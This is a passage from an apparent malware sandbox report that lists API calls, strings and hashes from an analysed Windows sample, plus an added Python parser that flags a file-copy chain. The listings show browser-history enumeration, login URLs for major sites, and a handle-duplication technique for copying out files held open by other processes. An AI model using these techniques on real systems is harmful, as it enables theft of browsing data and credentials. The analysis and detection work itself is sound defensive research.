40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E3EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E407
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E422
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E43D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                                                     Control-flow Graph: function 004091B8 (basic blocks 004091B8-00409526); graph rendering not reproduced
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                    • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
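
The API listing above is more useful when it is machine-readable: the argument values the analyser resolved (OpenProcess with 00000040, NtQuerySystemInformation with class 00000010, CreateFileMappingW with 00000002, MapViewOfFile with 00000004) are documented Win32/NT constants, and the order of the direct calls at 0040E093 through 0040E12E is the handle-duplication chain by which a file that another process holds open is copied out without opening it by name. The script below is an added example for this page, not Joe Sandbox code and not code from the analysed sample. It parses "APIs" lines in the format used throughout this section (bulleted, with or without an argument list, and with the "Part of subcall function" prefix), decodes the known constants, and reports whether the handle-duplication chain is present. SAMPLE is copied verbatim from the listing above; the constant names are the standard Windows SDK values; reading the chain as a locked-file copy is an inference from the call order and arguments, not something the report states.

```python
"""Parse the "APIs" listing of a Joe Sandbox disassembly section and flag the
handle-duplication file-copy chain shown for the function around 0040E093.

Added example for this report page; not Joe Sandbox's code and not code from
the analysed sample. SAMPLE is copied from the report section above.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence

# Copied from the report: the API lines of the function whose own calls start
# at 0040E093 (bullets and indentation dropped). Lines prefixed with
# "Part of subcall function X:" were made inside callee X, not by the function.
SAMPLE = """\
Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
CloseHandle.KERNELBASE(?), ref: 0040E13E
"""

# One report line: optional subcall prefix, Api.MODULE, optional (args), ref.
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<callee>[0-9A-F]{8}): )?"
    r"(?P<api>[\w?@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]{8})$"
)
HEX_RE = re.compile(r"(-?)([0-9A-F]{8})")

# Documented Windows SDK / NT values for the arguments the analyser resolved.
PROCESS_DUP_HANDLE = 0x0040
SYSTEM_HANDLE_INFORMATION = 0x10
KNOWN_ARGS = {
    ("OpenProcess", 0): {PROCESS_DUP_HANDLE: "PROCESS_DUP_HANDLE"},
    ("NtQuerySystemInformation", 0): {SYSTEM_HANDLE_INFORMATION: "SystemHandleInformation"},
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ"},
    ("CreateFileW", 2): {0x3: "FILE_SHARE_READ|FILE_SHARE_WRITE"},
    ("CreateFileW", 4): {0x3: "OPEN_EXISTING"},
    ("CreateFileMappingW", 2): {0x2: "PAGE_READONLY"},
    ("MapViewOfFile", 1): {0x4: "FILE_MAP_READ"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[object]]   # int, str (symbolic) or None ("?")
    ref: int                        # address of the call instruction
    callee: Optional[int]           # subcall the call was made in, if any

    @property
    def direct(self) -> bool:
        return self.callee is None


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                 # value the analyser could not resolve
    m = HEX_RE.fullmatch(tok)
    if m:
        v = int(m.group(2), 16)
        return -v if m.group(1) else v
    return tok                      # string literal or Function_xxxxxxxx


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every line that matches the report's API-call format; headers
    such as "APIs"/"Strings" and graph residue are skipped."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip().lstrip("•").strip())
        if not m:
            continue
        args_txt = m.group("args")
        args = [parse_arg(a) for a in args_txt.split(",")] if args_txt else []
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("module"), args=args,
            ref=int(m.group("ref"), 16),
            callee=int(m.group("callee"), 16) if m.group("callee") else None))
    return calls


def decode_args(call: ApiCall) -> List[object]:
    """Replace numeric arguments with their SDK names where the value is known."""
    return [KNOWN_ARGS.get((call.api, i), {}).get(v, v) if isinstance(v, int) else v
            for i, v in enumerate(call.args)]


def enumerates_system_handles(calls: List[ApiCall]) -> bool:
    """True if any call (own or in a callee) asks for SystemHandleInformation,
    the system-wide handle table used to find who holds a given file open."""
    return any(c.api == "NtQuerySystemInformation" and c.args
               and c.args[0] == SYSTEM_HANDLE_INFORMATION for c in calls)


COPY_CHAIN: Sequence[str] = ("OpenProcess", "DuplicateHandle",
                             "CreateFileMappingW", "MapViewOfFile", "WriteFile")


def find_handle_dup_copy(calls: List[ApiCall]) -> Optional[List[int]]:
    """Return the ref of each step if the function itself performs, in order:
    OpenProcess with PROCESS_DUP_HANDLE, DuplicateHandle, map the duplicated
    file handle, WriteFile the bytes out. That is the sequence the report shows
    at 0040E093..0040E12E. Only the function's own calls are considered."""
    refs: List[int] = []
    for c in (c for c in calls if c.direct):
        if c.api != COPY_CHAIN[len(refs)]:
            continue
        if c.api == "OpenProcess":
            mask = c.args[0] if c.args else None
            if isinstance(mask, int) and not mask & PROCESS_DUP_HANDLE:
                continue            # cannot DuplicateHandle out of that process
        refs.append(c.ref)
        if len(refs) == len(COPY_CHAIN):
            return refs
    return None


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for c in calls:
        where = "" if c.direct else f"  [in {c.callee:08X}]"
        print(f"{c.ref:08X} {c.api}.{c.module}{tuple(decode_args(c))}{where}")
    print("SystemHandleInformation queried:", enumerates_system_handles(calls))
    print("handle-dup copy chain at:",
          [f"{r:08X}" for r in find_handle_dup_copy(calls) or []])
```

Run it against any other "APIs" block in this report by pasting the lines into SAMPLE; the parser also accepts the argument forms that appear elsewhere in the section (negative hex such as -00000121, Function_xxxxxxxx references, and string literals such as EnumProcessModules). The chain check deliberately ignores calls inside subcalls, because the report lists those for context and they belong to a different function.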

                                                                                                                                                                                     Control-flow Graph: function 00413F4F (basic blocks 00413F4F-00413FA5); graph rendering not reproduced
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                    • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• API String ID: 2470578098-1702587658
• Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph

APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• API String ID: 77810686-1717621600
• Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Control-flow Graph

APIs
• memset.MSVCRT ref: 0041249C
• ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
• LoadIconW.USER32(00000000,00000065), ref: 0041258B
• wcscpy.MSVCRT ref: 004125A0
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
